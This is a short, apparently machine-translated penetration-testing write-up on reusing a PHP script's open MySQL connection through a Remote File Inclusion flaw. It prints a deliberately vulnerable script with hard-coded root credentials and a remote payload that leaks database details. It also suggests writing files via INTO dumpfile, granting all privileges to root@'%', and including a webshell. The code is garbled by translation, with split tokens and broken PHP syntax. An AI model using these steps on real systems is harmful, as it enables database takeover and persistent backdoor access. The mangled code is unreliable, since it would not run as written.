MySQL Session Hijacking over RFI

This is caused by the mysql_close function.
 
Reference: http://php.net/manual/en/function.mysql-close.php
 
Mysql_close () closes the non-persistent connection to the MySQL server that's associated with the specified link identifier. If link_identifier isn' t specified, the last opened link is used.
 
Using mysql_close () isn' t usually necessary, as non-persistent open links are automatically closed at the end of the script's execution. See also freeing resources.
 
Generally, mysql_close () is not required, because the opened non-persistent connection is automatically closed after the script is executed.
 
Test: mysql. php
Www.2cto.com
<? Php
$ Host = "localhost ";
$ User = "root ";
$ Pass = "rootpass ";
$ Db = "test ";
// Current
$ Connect = mysql_connect ($ host, $ user, $ pass );
Mysql_select_db ($ db, $ connect );
$ Query = mysql_query ("SELECT uname FROM admin ");
While ($ lol = mysql_fetch_array ($ query )){
Echo "we get it:". $ lol ["uname"]. "<br> ";
}
Include ($ _ GET ["page"]); // SCRIPT HAVE RFI
?> Local:
 
<? Php
$ Edevil = mysql_query ("SELECT concat_ws (0x3a, database (), version (), user ());");
$ A = mysql_fetch_array ($ edevil );
Echo $ a [0];
?> When the URL is submitted, the local code is executed by the remote host.
 
 
 
When programmers write code, they always like to connect to database files separately and include them when other files are involved, such as include ("dbtabase. php ");
 
If a PHP file is included in the penetration test and the database is included, we can operate its database. Maybe we can do something else, for example: SELECT 'Hello world' INTO dumpfile'/tmp/test.txt ',
Or: grant all privileges on *. * TO 'root' @ '%' identified by 'pass' with grant option;
Of course it's much better to directly include a Webshell.
Refer:
MySQL Session Hijacking over RFI
Http://www.dis9.com/wp-content/uploads/2012/03/mysql.txt